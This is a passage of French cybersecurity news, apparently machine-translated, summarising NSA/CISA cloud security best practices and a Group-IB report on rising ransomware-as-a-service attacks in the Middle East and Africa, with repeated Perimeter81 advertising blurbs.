hybrides et multi-cloud : ce CSI aborde les défis liés à la mise en œuvre des environnements hybrides et multi-cloud en proposant des solutions pour atténuer la complexité accrue.

NSA publie les dix meilleures pratiques Atténuer les risques liés aux fournisseurs de services gérés dans les environnements cloud (en collaboration avec CISA) : les MSP gèrent les services informatiques dans le cloud, offrant sauvegarde, infrastructure et sécurité. Ils proposent des solutions sur mesure, mais leur utilisation augmente les risques de cybersécurité. Gérez les journaux cloud pour une chasse efficace aux menaces : l'accès des locataires cloud est complexe en raison de la virtualisation, car la sécurité repose sur des journaux non modifiables. Ainsi, les politiques d’accès, les journaux et les audits doivent être surveillés. Les organisations doivent gérer les journaux pour la recherche des menaces et la conformité. Le cloud computing améliore l'efficacité et la sécurité informatiques s'il est déployé correctement. Cependant, la concentration des données attire les acteurs malveillants, ces lignes directrices leur permettront donc de protéger leur environnement cloud. Avec la protection contre les logiciels malveillants Perimeter81, vous pouvez bloquer les logiciels malveillants, notamment les chevaux de Troie, les ransomwares, les logiciels espions, les rootkits, les vers et les exploits Zero Day. Tous sont incroyablement dangereux et peuvent faire des ravages sur votre réseau. Restez informé des actualités sur la cybersécurité, des livres blancs et des infographies. Suivez-nous sur LinkedIn et Twitter. L'article NSA publie les dix meilleures pratiques pour les environnements cloud apparaît en premier sur GBHackers on Security | Plateforme d'information sur la cybersécurité n°1 mondialement fiable.

La région Moyen-Orient et Afrique (MEA) a connu une recrudescence des attaques de ransomware-as-a-service (RaaS), qui constituent une grave menace pour la sécurité numérique. Ce rapport complet examine les principales conclusions, les tendances des attaques, l'impact sur les entreprises et les mesures préventives cruciales qui doivent être adoptées pour lutter contre cette cybermenace croissante. Le parcours de transformation numérique de la région MEA, tout en ouvrant de nouvelles voies de croissance, l’a également exposée à des cybermenaces sophistiquées. Parmi celles-ci, les attaques de ransomwares sont apparues comme un formidable défi, avec une augmentation notable des incidents orchestrés via le modèle RaaS. Data Leaks in the Middle East & Africa Fuites de données au Moyen-Orient et en Afrique Ce phénomène met non seulement en danger la sécurité des données critiques, mais compromet également la stabilité économique des régions touchées. Analyse technique Les pays du Conseil de coopération du Golfe (CCG), l’Afrique du Sud et la Turquie ont été identifiés comme des points chauds de ces cyberattaques. Le rapport souligne également la prolifération des voleurs d'informations, avec plus de 1,2 million d'appareils infectés dans la MEA, soulignant la portée étendue des réseaux cybercriminels. LockBit, BlackCat (ALPHV) et Arvin Club ont été identifiés comme les gangs de ransomwares les plus actifs de la région, LockBit représentant 38 % des attaques. Attaques contre rançon Une étude récente du Group-IB met en évidence une augmentation stupéfiante de 68 % des attaques de ransomwares dans la région MEA, les secteurs des services financiers et de l'immobilier étant les principales cibles. Cette augmentation des incidents de ransomware est attribuée au modèle RaaS, qui a démocratisé l'accès à des outils de cyberattaque sophistiqués, permettant même aux criminels peu qualifiés de lancer des attaques dévastatrices. Tendances des attaques Le modèle RaaS a considérablement réduit les barrières à l’entrée des cybercriminels, conduisant à une diversification des cibles et à une augmentation de la fréquence des attaques. Les secteurs des services financiers, de l’immobilier et de l’industrie manufacturière ont été les plus touchés par ces attaques, avec une augmentation notable des fuites de données et des réseaux d’entreprise compromis. L’implication des Initial Access Brokers (IAB) dans la vente de l’accès à ces réseaux sur le dark web complique encore davantage le paysage des menaces, obligeant les entreprises à renforcer leurs défenses en matière de cybersécurité. Vous pouvez bloquer les logiciels malveillants, notamment les chevaux de Troie, les ransomwares, les logiciels espions, les rootkits, les vers et les exploits du jour zéro, grâce à la protection contre les logiciels malveillants Perimeter81. Tous sont incroyablement dangereux, peuvent faire des ravages et endommager votre réseau.